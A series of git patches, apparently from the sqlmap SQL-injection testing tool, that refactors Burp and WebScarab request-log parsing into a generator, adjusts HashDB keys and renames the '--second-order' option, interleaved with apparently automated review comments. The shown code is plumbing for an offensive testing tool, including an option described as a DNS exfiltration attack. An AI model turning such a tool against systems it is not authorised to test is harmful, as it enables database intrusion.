@@ -48,7 +48,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -fb320879e5b086c37527ce8f9ff2d7ce lib/core/settings.py +61b6f5d056e09f542f13a8f75287aac9 lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 36bd2dc292c0e10e39bd9c43b77fe1bc lib/core/target.py From 53578bcb7cea2edd91023785896095f1a3043521 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 19 Jun 2018 14:56:39 +0200 Subject: [PATCH 171/428] Generic patch related to the #3153 --- lib/core/common.py | 4 ++-- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 5 insertions(+), 5 deletions(-) diff --git a/lib/core/common.py b/lib/core/common.py index a439ba89618..902e840566a 100644 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -4281,7 +4281,7 @@ def hashDBWrite(key, value, serialize=False): Helper function for writing session data to HashDB """ - _ = '|'.join((conf.hostname, conf.path.strip('/') if conf.path is not None else str(conf.port), key, HASHDB_MILESTONE_VALUE)) + _ = '|'.join((str(_) if not isinstance(_, basestring) else _) for _ in (conf.hostname, conf.path.strip('/') if conf.path is not None else conf.port, key, HASHDB_MILESTONE_VALUE)) conf.hashDB.write(_, value, serialize) def hashDBRetrieve(key, unserialize=False, checkConf=False): 
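Review bot: The key-building generator in hashDBWrite reuses `_` both as the loop variable and as the name the result is bound to, and the identical expression appears again in hashDBRetrieve in the next hunk; a shared helper keeps the two key formats from drifting apart, which matters because any mismatch would make every session lookup silently miss. The helper below is behaviour-preserving for the values the hunks show. The `'|'` separator is not escaped inside the parts, so a hostname or path containing `|` could collide with another target's key; that is presumably rare enough to leave as is, but deserves a comment on the helper.
```python
def _hashDBKey(key):
    """
    Builds the HashDB key for the current target (hostname plus path, or port when there is no path) and the milestone value
    """

    parts = (conf.hostname, conf.path.strip('/') if conf.path is not None else conf.port, key, HASHDB_MILESTONE_VALUE)
    return '|'.join(part if isinstance(part, basestring) else str(part) for part in parts)

def hashDBWrite(key, value, serialize=False):
    # … unchanged: docstring …
    conf.hashDB.write(_hashDBKey(key), value, serialize)
```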
@@ -4289,7 +4289,7 @@ def hashDBRetrieve(key, unserialize=False, checkConf=False): Helper function for restoring session data from HashDB """ - _ = '|'.join((conf.hostname, conf.path.strip('/') if conf.path is not None else str(conf.port), key, HASHDB_MILESTONE_VALUE)) + _ = '|'.join((str(_) if not isinstance(_, basestring) else _) for _ in (conf.hostname, conf.path.strip('/') if conf.path is not None else conf.port, key, HASHDB_MILESTONE_VALUE)) retVal = conf.hashDB.retrieve(_, unserialize) if kb.resumeValues and not (checkConf and any((conf.flushSession, conf.freshQueries))) else None if not kb.inferenceMode and not kb.fileReadMode and isinstance(retVal, basestring) and any(_ in retVal for _ in (PARTIAL_VALUE_MARKER, PARTIAL_HEX_VALUE_MARKER)): diff --git a/lib/core/settings.py b/lib/core/settings.py index 7549a082899..11b898332be 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.6.20" +VERSION = "1.2.6.21" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index d631ef2aba4..e1c5360a167 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -28,7 +28,7 @@ c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py 0adf547455a76dc71e6a599e52da1ed9 lib/core/agent.py fd8f239e259afaf5f24bcf34a0ad187f lib/core/bigarray.py -2dde54b2f690247ee715b2f5cf6c258b lib/core/common.py +5fb7d0339b64859c6d2bac3341ce496c lib/core/common.py 0d082da16c388b3445e656e0760fb582 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py 
@@ -48,7 +48,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -61b6f5d056e09f542f13a8f75287aac9 lib/core/settings.py +070499b0c66d5dd7c95dd75ba7d5abe6 lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 36bd2dc292c0e10e39bd9c43b77fe1bc lib/core/target.py From 961d2b24d16f9902c9b2ffe8e78dd248fc418908 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 19 Jun 2018 16:08:38 +0200 Subject: [PATCH 172/428] First commit regarding #739 --- lib/core/common.py | 195 +++++++++++++++++++++++++++++++++++++ lib/core/option.py | 224 ++++--------------------------------------- lib/core/settings.py | 2 +- txt/checksum.md5 | 6 +- 4 files changed, 217 insertions(+), 210 deletions(-) diff --git a/lib/core/common.py b/lib/core/common.py index 902e840566a..8b1192d94e8 100644 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -5,6 +5,7 @@ See the file 'LICENSE' for copying permission """ +import binascii import codecs import contextlib import cookielib @@ -101,7 +102,10 @@ from lib.core.settings import BRUTE_DOC_ROOT_PREFIXES from lib.core.settings import BRUTE_DOC_ROOT_SUFFIXES from lib.core.settings import BRUTE_DOC_ROOT_TARGET_MARK +from lib.core.settings import BURP_REQUEST_REGEX +from lib.core.settings import BURP_XML_HISTORY_REGEX from lib.core.settings import DBMS_DIRECTORY_DICT +from lib.core.settings import CRAWL_EXCLUDE_EXTENSIONS from lib.core.settings import CUSTOM_INJECTION_MARK_CHAR from lib.core.settings import DEFAULT_COOKIE_DELIMITER from lib.core.settings import DEFAULT_GET_POST_DELIMITER 
@@ -139,6 +143,7 @@ from lib.core.settings import PAYLOAD_DELIMITER from lib.core.settings import PLATFORM from lib.core.settings import PRINTABLE_CHAR_REGEX +from lib.core.settings import PROBLEMATIC_CUSTOM_INJECTION_PATTERNS from lib.core.settings import PUSH_VALUE_EXCEPTION_RETRY_COUNT from lib.core.settings import PYVERSION from lib.core.settings import REFERER_ALIASES @@ -161,6 +166,7 @@ from lib.core.settings import URLENCODE_FAILSAFE_CHARS from lib.core.settings import USER_AGENT_ALIASES from lib.core.settings import VERSION_STRING +from lib.core.settings import WEBSCARAB_SPLITTER from lib.core.threads import getCurrentThreadData from lib.utils.sqlalchemy import _sqlalchemy from thirdparty.clientform.clientform import ParseResponse 
@@ -4468,6 +4474,195 @@ def pollProcess(process, suppress_errors=False): break +def parseRequestFile(reqFile): + """ + Parses WebScarab and Burp logs and adds results to the target URL list + """ + + def _parseWebScarabLog(content): + """ + Parses WebScarab logs (POST method not supported) + """ + + reqResList = content.split(WEBSCARAB_SPLITTER) + + for request in reqResList: + url = extractRegexResult(r"URL: (?P.+?)\n", request, re.I) + method = extractRegexResult(r"METHOD: (?P.+?)\n", request, re.I) + cookie = extractRegexResult(r"COOKIE: (?P.+?)\n", request, re.I) + + if not method or not url: + logger.debug("not a valid WebScarab log data") + continue + + if method.upper() == HTTPMETHOD.POST: + warnMsg = "POST requests from WebScarab logs aren't supported " + warnMsg += "as their body content is stored in separate files. " + warnMsg += "Nevertheless you can use -r to load them individually." + logger.warning(warnMsg) + continue + + if not(conf.scope and not re.search(conf.scope, url, re.I)): + yield (url, method, None, cookie, None) + + def _parseBurpLog(content): + """ + Parses Burp logs + """ + + if not re.search(BURP_REQUEST_REGEX, content, re.I | re.S): + if re.search(BURP_XML_HISTORY_REGEX, content, re.I | re.S): + reqResList = [] + for match in re.finditer(BURP_XML_HISTORY_REGEX, content, re.I | re.S): + port, request = match.groups() + try: + request = request.decode("base64") + except binascii.Error: + continue + _ = re.search(r"%s:.+" % re.escape(HTTP_HEADER.HOST), request) + if _: + host = _.group(0).strip() + if not re.search(r":\d+\Z", host): + request = request.replace(host, "%s:%d" % (host, int(port))) + reqResList.append(request) + else: + reqResList = [content] + else: + reqResList = re.finditer(BURP_REQUEST_REGEX, content, re.I | re.S) + + for match in reqResList: + request = match if isinstance(match, basestring) else match.group(0) + request = re.sub(r"\A[^\w]+", "", request) + + schemePort = 
re.search(r"(http[\w]*)\:\/\/.*?\:([\d]+).+?={10,}", request, re.I | re.S) + + if schemePort: + scheme = schemePort.group(1) + port = schemePort.group(2) + request = re.sub(r"\n=+\Z", "", request.split(schemePort.group(0))[-1].lstrip()) + else: + scheme, port = None, None + + if not re.search(r"^[\n]*(%s).*?\sHTTP\/" % "|".join(getPublicTypeMembers(HTTPMETHOD, True)), request, re.I | re.M): + continue + + if re.search(r"^[\n]*%s.*?\.(%s)\sHTTP\/" % (HTTPMETHOD.GET, "|".join(CRAWL_EXCLUDE_EXTENSIONS)), request, re.I | re.M): + continue + + getPostReq = False + url = None + host = None + method = None + data = None + cookie = None + params = False + newline = None + lines = request.split('\n') + headers = [] + + for index in xrange(len(lines)): + line = lines[index] + + if not line.strip() and index == len(lines) - 1: + break + + newline = "\r\n" if line.endswith('\r') else '\n' + line = line.strip('\r') + match = re.search(r"\A(%s) (.+) HTTP/[\d.]+\Z" % "|".join(getPublicTypeMembers(HTTPMETHOD, True)), line) if not method else None + + if len(line.strip()) == 0 and method and method != HTTPMETHOD.GET and data is None: + data = "" + params = True + + elif match: + method = match.group(1) + url = match.group(2) + + if any(_ in line for _ in ('?', '=', kb.customInjectionMark)): + params = True + + getPostReq = True + + # POST parameters + elif data is not None and params: + data += "%s%s" % (line, newline) + + # GET parameters + elif "?" 
in line and "=" in line and ": " not in line: + params = True + + # Headers + elif re.search(r"\A\S+:", line): + key, value = line.split(":", 1) + value = value.strip().replace("\r", "").replace("\n", "") + + # Cookie and Host headers + if key.upper() == HTTP_HEADER.COOKIE.upper(): + cookie = value + elif key.upper() == HTTP_HEADER.HOST.upper(): + if '://' in value: + scheme, value = value.split('://')[:2] + splitValue = value.split(":") + host = splitValue[0] + + if len(splitValue) > 1: + port = filterStringValue(splitValue[1], "[0-9]") + + # Avoid to add a static content length header to + # headers and consider the following lines as + # POSTed data + if key.upper() == HTTP_HEADER.CONTENT_LENGTH.upper(): + params = True + + # Avoid proxy and connection type related headers + elif key not in (HTTP_HEADER.PROXY_CONNECTION, HTTP_HEADER.CONNECTION): + headers.append((getUnicode(key), getUnicode(value))) + + if kb.customInjectionMark in re.sub(PROBLEMATIC_CUSTOM_INJECTION_PATTERNS, "", value or ""): + params = True + + data = data.rstrip("\r\n") if data else data + + if getPostReq and (params or cookie): + if not port and isinstance(scheme, basestring) and scheme.lower() == "https": + port = "443" + elif not scheme and port == "443": + scheme = "https" + + if conf.forceSSL: + scheme = "https" + port = port or "443" + + if not host: + errMsg = "invalid format of a request file" + raise SqlmapSyntaxException(errMsg) + + if not url.startswith("http"): + url = "%s://%s:%s%s" % (scheme or "http", host, port or "80", url) + scheme = None + port = None + + if not(conf.scope and not re.search(conf.scope, url, re.I)): + yield (url, conf.method or method, data, cookie, tuple(headers)) + + checkFile(reqFile) + try: + with openFile(reqFile, "rb") as f: + content = f.read() + except (IOError, OSError, MemoryError), ex: + errMsg = "something went wrong while trying " + errMsg += "to read the content of file '%s' ('%s')" % (reqFile, getSafeExString(ex)) + raise 
SqlmapSystemException(errMsg) + + if conf.scope: + logger.info("using regular expression '%s' for filtering targets" % conf.scope) + + for target in _parseBurpLog(content): + yield target + + for target in _parseWebScarabLog(content): + yield target + def getSafeExString(ex, encoding=None): """ Safe way how to get the proper exception represtation as a string diff --git a/lib/core/option.py b/lib/core/option.py index 761ac15d522..bca5974f3e9 100644 --- a/lib/core/option.py +++ b/lib/core/option.py @@ -5,7 +5,6 @@ See the file 'LICENSE' for copying permission """ -import binascii import cookielib import glob import inspect @@ -47,6 +46,7 @@ from lib.core.common import normalizePath from lib.core.common import ntToPosixSlashes from lib.core.common import openFile +from lib.core.common import parseRequestFile from lib.core.common import parseTargetDirect from lib.core.common import parseTargetUrl from lib.core.common import paths @@ -99,10 +99,7 @@ from lib.core.exception import SqlmapUserQuitException from lib.core.log import FORMATTER from lib.core.optiondict import optDict -from lib.core.settings import BURP_REQUEST_REGEX -from lib.core.settings import BURP_XML_HISTORY_REGEX from lib.core.settings import CODECS_LIST_PAGE -from lib.core.settings import CRAWL_EXCLUDE_EXTENSIONS from lib.core.settings import CUSTOM_INJECTION_MARK_CHAR from lib.core.settings import DBMS_ALIASES from lib.core.settings import DEFAULT_PAGE_ENCODING @@ -119,7 +116,6 @@ from lib.core.settings import NULL from lib.core.settings import PARAMETER_SPLITTING_REGEX from lib.core.settings import PRECONNECT_CANDIDATE_TIMEOUT -from lib.core.settings import PROBLEMATIC_CUSTOM_INJECTION_PATTERNS from lib.core.settings import SITE from lib.core.settings import SOCKET_PRE_CONNECT_QUEUE_SIZE from lib.core.settings import SQLMAP_ENVIRONMENT_PREFIX 
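Review bot: In `_parseBurpLog`'s XML-history branch the Host lookup `re.search(r"%s:.+" % re.escape(HTTP_HEADER.HOST), request)` is case-sensitive, while the header loop further down matches with `key.upper() == HTTP_HEADER.HOST.upper()`, so a lowercase `host:` header never gets the captured port appended and the target silently falls back to the scheme's default port; passing `re.I` there and limiting the rewrite to one occurrence, `request = request.replace(host, "%s:%d" % (host, int(port)), 1)`, also stops the replacement from touching the same text if it recurs in the body. `int(port)` is unguarded as well: unless `BURP_XML_HISTORY_REGEX` (not visible here) restricts that group to digits, one malformed entry aborts the whole parse with ValueError instead of being skipped the way a bad base64 blob is. The docstring `Parses WebScarab and Burp logs and adds results to the target URL list` is stale now that the function is a generator; it should say that it yields `(url, method, data, cookie, headers)` tuples filtered by `conf.scope`, and that it raises SqlmapSyntaxException for a request without a Host header and SqlmapSystemException when the file cannot be read.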
@@ -131,7 +127,6 @@ from lib.core.settings import UNKNOWN_DBMS_VERSION from lib.core.settings import URI_INJECTABLE_REGEX from lib.core.settings import VERSION_STRING -from lib.core.settings import WEBSCARAB_SPLITTER from lib.core.threads import getCurrentThreadData from lib.core.threads import setDaemon from lib.core.update import update 
@@ -173,201 +168,6 @@ except NameError: WindowsError = None -def _feedTargetsDict(reqFile, addedTargetUrls): - """ - Parses web scarab and burp logs and adds results to the target URL list - """ - - def _parseWebScarabLog(content): - """ - Parses web scarab logs (POST method not supported) - """ - - reqResList = content.split(WEBSCARAB_SPLITTER) - - for request in reqResList: - url = extractRegexResult(r"URL: (?P.+?)\n", request, re.I) - method = extractRegexResult(r"METHOD: (?P.+?)\n", request, re.I) - cookie = extractRegexResult(r"COOKIE: (?P.+?)\n", request, re.I) - - if not method or not url: - logger.debug("not a valid WebScarab log data") - continue - - if method.upper() == HTTPMETHOD.POST: - warnMsg = "POST requests from WebScarab logs aren't supported " - warnMsg += "as their body content is stored in separate files. " - warnMsg += "Nevertheless you can use -r to load them individually." - logger.warning(warnMsg) - continue - - if not(conf.scope and not re.search(conf.scope, url, re.I)): - if not kb.targets or url not in addedTargetUrls: - kb.targets.add((url, method, None, cookie, None)) - addedTargetUrls.add(url) - - def _parseBurpLog(content): - """ - Parses burp logs - """ - - if not re.search(BURP_REQUEST_REGEX, content, re.I | re.S): - if re.search(BURP_XML_HISTORY_REGEX, content, re.I | re.S): - reqResList = [] - for match in re.finditer(BURP_XML_HISTORY_REGEX, content, re.I | re.S): - port, request = match.groups() - try: - request = request.decode("base64") - except binascii.Error: - continue - _ = re.search(r"%s:.+" % re.escape(HTTP_HEADER.HOST), request) - if _: - host = _.group(0).strip() - if not re.search(r":\d+\Z", host): - request = request.replace(host, "%s:%d" % (host, int(port))) - reqResList.append(request) - else: - reqResList = [content] - else: - reqResList = re.finditer(BURP_REQUEST_REGEX, content, re.I | re.S) - - for match in reqResList: - request = match if isinstance(match, basestring) else match.group(0) - request = 
re.sub(r"\A[^\w]+", "", request) - - schemePort = re.search(r"(http[\w]*)\:\/\/.*?\:([\d]+).+?={10,}", request, re.I | re.S) - - if schemePort: - scheme = schemePort.group(1) - port = schemePort.group(2) - request = re.sub(r"\n=+\Z", "", request.split(schemePort.group(0))[-1].lstrip()) - else: - scheme, port = None, None - - if not re.search(r"^[\n]*(%s).*?\sHTTP\/" % "|".join(getPublicTypeMembers(HTTPMETHOD, True)), request, re.I | re.M): - continue - - if re.search(r"^[\n]*%s.*?\.(%s)\sHTTP\/" % (HTTPMETHOD.GET, "|".join(CRAWL_EXCLUDE_EXTENSIONS)), request, re.I | re.M): - continue - - getPostReq = False - url = None - host = None - method = None - data = None - cookie = None - params = False - newline = None - lines = request.split('\n') - headers = [] - - for index in xrange(len(lines)): - line = lines[index] - - if not line.strip() and index == len(lines) - 1: - break - - newline = "\r\n" if line.endswith('\r') else '\n' - line = line.strip('\r') - match = re.search(r"\A(%s) (.+) HTTP/[\d.]+\Z" % "|".join(getPublicTypeMembers(HTTPMETHOD, True)), line) if not method else None - - if len(line.strip()) == 0 and method and method != HTTPMETHOD.GET and data is None: - data = "" - params = True - - elif match: - method = match.group(1) - url = match.group(2) - - if any(_ in line for _ in ('?', '=', kb.customInjectionMark)): - params = True - - getPostReq = True - - # POST parameters - elif data is not None and params: - data += "%s%s" % (line, newline) - - # GET parameters - elif "?" 
in line and "=" in line and ": " not in line: - params = True - - # Headers - elif re.search(r"\A\S+:", line): - key, value = line.split(":", 1) - value = value.strip().replace("\r", "").replace("\n", "") - - # Cookie and Host headers - if key.upper() == HTTP_HEADER.COOKIE.upper(): - cookie = value - elif key.upper() == HTTP_HEADER.HOST.upper(): - if '://' in value: - scheme, value = value.split('://')[:2] - splitValue = value.split(":") - host = splitValue[0] - - if len(splitValue) > 1: - port = filterStringValue(splitValue[1], "[0-9]") - - # Avoid to add a static content length header to - # headers and consider the following lines as - # POSTed data - if key.upper() == HTTP_HEADER.CONTENT_LENGTH.upper(): - params = True - - # Avoid proxy and connection type related headers - elif key not in (HTTP_HEADER.PROXY_CONNECTION, HTTP_HEADER.CONNECTION): - headers.append((getUnicode(key), getUnicode(value))) - - if kb.customInjectionMark in re.sub(PROBLEMATIC_CUSTOM_INJECTION_PATTERNS, "", value or ""): - params = True - - data = data.rstrip("\r\n") if data else data - - if getPostReq and (params or cookie): - if not port and isinstance(scheme, basestring) and scheme.lower() == "https": - port = "443" - elif not scheme and port == "443": - scheme = "https" - - if conf.forceSSL: - scheme = "https" - port = port or "443" - - if not host: - errMsg = "invalid format of a request file" - raise SqlmapSyntaxException(errMsg) - - if not url.startswith("http"): - url = "%s://%s:%s%s" % (scheme or "http", host, port or "80", url) - scheme = None - port = None - - if not(conf.scope and not re.search(conf.scope, url, re.I)): - if not kb.targets or url not in addedTargetUrls: - kb.targets.add((url, conf.method or method, data, cookie, tuple(headers))) - addedTargetUrls.add(url) - - checkFile(reqFile) - try: - with openFile(reqFile, "rb") as f: - content = f.read() - except (IOError, OSError, MemoryError), ex: - errMsg = "something went wrong while trying " - errMsg += "to read the 
content of file '%s' ('%s')" % (reqFile, getSafeExString(ex)) - raise SqlmapSystemException(errMsg) - - if conf.scope: - logger.info("using regular expression '%s' for filtering targets" % conf.scope) - - _parseBurpLog(content) - _parseWebScarabLog(content) - - if not addedTargetUrls: - errMsg = "unable to find usable request(s) " - errMsg += "in provided file ('%s')" % reqFile - raise SqlmapGenericException(errMsg) - def _loadQueries(): """ Loads queries from 'xml/queries.xml' file. @@ -413,7 +213,7 @@ def _setMultipleTargets(): """ initialTargetsCount = len(kb.targets) - addedTargetUrls = set() + seen = set() if not conf.logFile: return @@ -426,7 +226,11 @@ def _setMultipleTargets(): raise SqlmapFilePathException(errMsg) if os.path.isfile(conf.logFile): - _feedTargetsDict(conf.logFile, addedTargetUrls) + for target in parseRequestFile(conf.logFile): + url = target[0] + if url not in seen: + kb.targets.add(target) + seen.add(url) elif os.path.isdir(conf.logFile): files = os.listdir(conf.logFile) @@ -436,7 +240,11 @@ def _setMultipleTargets(): if not re.search(r"([\d]+)\-request", reqFile): continue - _feedTargetsDict(os.path.join(conf.logFile, reqFile), addedTargetUrls) + for target in parseRequestFile(os.path.join(conf.logFile, reqFile)): + url = target[0] + if url not in seen: + kb.targets.add(target) + seen.add(url) else: errMsg = "the specified list of targets is not a file " @@ -480,7 +288,7 @@ def _setRequestFromFile(): if not conf.requestFile: return - addedTargetUrls = set() + seen = set() conf.requestFile = safeExpandUser(conf.requestFile) @@ -492,7 +300,11 @@ def _setRequestFromFile(): infoMsg = "parsing HTTP request from '%s'" % conf.requestFile logger.info(infoMsg) - _feedTargetsDict(conf.requestFile, addedTargetUrls) + for target in parseRequestFile(conf.requestFile): + url = target[0] + if url not in seen: + kb.targets.add(target) + seen.add(url) def _setCrawler(): if not conf.crawlDepth: 
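Review bot: The new call sites of `parseRequestFile` in this hunk and in the two `_setMultipleTargets` hunks above drop the check the removed `_feedTargetsDict` ended with — `if not addedTargetUrls: raise SqlmapGenericException("unable to find usable request(s) ...")` — so a `-r`/`-l` file with no parseable request now adds nothing to `kb.targets` without any error and the failure surfaces later in a less helpful form. Restoring it after the loop, e.g. `if not seen: raise SqlmapGenericException("unable to find usable request(s) in provided file ('%s')" % conf.requestFile)`, keeps the previous behaviour. The same four-line dedup loop is now pasted three times; a small helper such as `_addTargets(path, seen)` wrapping the `for target in parseRequestFile(...)` loop would keep them from drifting apart. `_setRequestFromFile` starts above this hunk.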
diff --git a/lib/core/settings.py b/lib/core/settings.py index 11b898332be..ca9de243406 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.6.21" +VERSION = "1.2.6.22" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index e1c5360a167..e05247ead60 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -28,7 +28,7 @@ c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py 0adf547455a76dc71e6a599e52da1ed9 lib/core/agent.py fd8f239e259afaf5f24bcf34a0ad187f lib/core/bigarray.py -5fb7d0339b64859c6d2bac3341ce496c lib/core/common.py +e57bda5d5e3011b4e2d8e0a21f546e77 lib/core/common.py 0d082da16c388b3445e656e0760fb582 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py 
@@ -41,14 +41,14 @@ cada93357a7321655927fc9625b3bfec lib/core/exception.py 1e5532ede194ac9c083891c2f02bca93 lib/core/__init__.py 458a194764805cd8312c14ecd4be4d1e lib/core/log.py c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py -332d4bb299a0edbc42100e3cfbead285 lib/core/option.py +90a061be1a0658c2bdb197511b61d6fa lib/core/option.py c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 7cfd04e583cca782b843f6f6d973981a lib/core/profiling.py 6f654e1715571eff68a0f8af3d62dcf8 lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -070499b0c66d5dd7c95dd75ba7d5abe6 lib/core/settings.py +dd2c8c71982173660be8b77f2af0fc3e lib/core/settings.py 0dfc2ed40adf72e302291f6ecd4406f6 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 36bd2dc292c0e10e39bd9c43b77fe1bc lib/core/target.py From 0265b3fcfa87f15d9b865e12b49da3199604399d Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 19 Jun 2018 16:11:49 +0200 Subject: [PATCH 173/428] Second commit regarding #739 --- lib/core/dicts.py | 1 + lib/core/optiondict.py | 2 +- lib/core/settings.py | 2 +- lib/parse/cmdline.py | 2 +- lib/request/connect.py | 4 ++-- sqlmap.conf | 2 +- txt/checksum.md5 | 10 +++++----- 7 files changed, 12 insertions(+), 11 deletions(-) diff --git a/lib/core/dicts.py b/lib/core/dicts.py index c07f65ff41c..a457b0262b5 100644 --- a/lib/core/dicts.py +++ b/lib/core/dicts.py @@ -279,6 +279,7 @@ "--binary": "use '--binary-fields' instead", "--auth-private": "use '--auth-file' instead", "--ignore-401": "use '--ignore-code' instead", + "--second-order": "use '--second-url' instead", "--check-payload": None, "--check-waf": None, "--pickled-options": "use '--api -c ...' instead", diff --git a/lib/core/optiondict.py b/lib/core/optiondict.py index b1f80398aea..56f1529f298 100644 --- a/lib/core/optiondict.py +++ b/lib/core/optiondict.py 
@@ -109,7 +109,7 @@ "uChar": "string", "uFrom": "string", "dnsDomain": "string", - "secondOrder": "string", + "secondUrl": "string", }, "Fingerprint": { diff --git a/lib/core/settings.py b/lib/core/settings.py index ca9de243406..83d74d3bc2f 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.6.22" +VERSION = "1.2.6.23" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/parse/cmdline.py b/lib/parse/cmdline.py index b8e843fccd3..ab6b2f8e16e 100644 --- a/lib/parse/cmdline.py +++ b/lib/parse/cmdline.py @@ -333,7 +333,7 @@ def cmdLineParser(argv=None): techniques.add_option("--dns-domain", dest="dnsDomain", help="Domain name used for DNS exfiltration attack") - techniques.add_option("--second-order", dest="secondOrder", + techniques.add_option("--second-url", dest="secondUrl", help="Resulting page URL searched for second-order response") # Fingerprint options diff --git a/lib/request/connect.py b/lib/request/connect.py index 3ad2ed32d3e..50f287bee13 100644 --- a/lib/request/connect.py +++ b/lib/request/connect.py 
@@ -1235,8 +1235,8 @@ def _randomizeParameter(paramString, randomParameter): warnMsg += "behavior in custom WAF/IPS/IDS solutions" singleTimeWarnMessage(warnMsg) - if conf.secondOrder: - page, headers, code = Connect.getPage(url=conf.secondOrder, cookie=cookie, ua=ua, silent=silent, auxHeaders=auxHeaders, response=response, raise404=False, ignoreTimeout=timeBasedCompare, refreshing=True) + if conf.secondUrl: + page, headers, code = Connect.getPage(url=conf.secondUrl, cookie=cookie, ua=ua, silent=silent, auxHeaders=auxHeaders, response=response, raise404=False, ignoreTimeout=timeBasedCompare, refreshing=True) threadData.lastQueryDuration = calculateDeltaSeconds(start) threadData.lastPage = page diff --git a/sqlmap.conf b/sqlmap.conf index f29a7be423d..e0c9eda0010 100644 --- a/sqlmap.conf +++ b/sqlmap.conf @@ -388,7 +388,7 @@ dnsDomain = # Resulting page URL searched for second-order response # Valid: string -secondOrder = +secondUrl = [Fingerprint] diff --git a/txt/checksum.md5 b/txt/checksum.md5 index e05247ead60..a96a1bd2882 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -34,13 +34,13 @@ e57bda5d5e3011b4e2d8e0a21f546e77 lib/core/common.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py 4086fb55f42e27de5330505605baad0f lib/core/decorators.py fbb55cc6100318ff922957b6577dc58f lib/core/defaults.py -da98f5288aad57855c6d287ba3b397a1 lib/core/dicts.py +f92abf47b2a41b75cd4b89ff0c93194c lib/core/dicts.py 9ea8a043030796e6faef7f7e957729d5 lib/core/dump.py bfffdc74a93ff647c49b79c215d96d8a lib/core/enums.py cada93357a7321655927fc9625b3bfec lib/core/exception.py 1e5532ede194ac9c083891c2f02bca93 lib/core/__init__.py 458a194764805cd8312c14ecd4be4d1e lib/core/log.py -c9a56e58984420a5abb7a3f7aadc196d lib/core/optiondict.py +262b62d685a2403586e6ca0aac2e41d8 lib/core/optiondict.py 90a061be1a0658c2bdb197511b61d6fa lib/core/option.py c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 7cfd04e583cca782b843f6f6d973981a lib/core/profiling.py 
